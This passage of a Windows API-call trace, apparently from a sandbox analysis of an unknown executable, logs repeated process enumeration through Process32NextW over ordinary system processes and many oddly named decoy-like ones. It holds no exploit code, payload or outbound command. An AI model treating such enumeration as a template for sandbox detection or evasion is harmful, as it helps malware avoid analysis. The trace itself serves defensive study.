th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.811] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.811] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0130.812] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.813] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.814] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0130.815] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.817] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0130.818] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0130.819] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0130.820] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0130.821] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.823] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0130.824] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0130.826] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0130.827] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0130.828] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0130.829] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0130.926] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0130.927] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0130.929] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0130.930] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0130.932] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0130.933] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0130.934] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0130.936] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0130.937] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0130.939] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0130.940] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0130.941] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0130.943] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0130.944] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0130.945] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0130.946] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.948] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0130.949] CloseHandle (hObject=0xc4) returned 1 [0130.949] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0130.955] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.956] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0130.957] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0130.958] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0130.959] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0130.960] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0130.960] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0130.961] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0130.962] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0130.963] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0130.963] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.964] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.965] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.966] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.966] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.967] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0130.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.970] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0130.989] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.990] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0130.991] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0130.992] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0130.993] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0130.995] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.996] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0130.997] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0130.998] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0130.999] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0131.001] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0131.003] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0131.004] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0131.005] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0131.006] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0131.007] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0131.008] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0131.009] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0131.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0131.011] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0131.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0131.013] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0131.014] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0131.015] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0131.017] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0131.018] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0131.019] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0131.020] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.021] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, 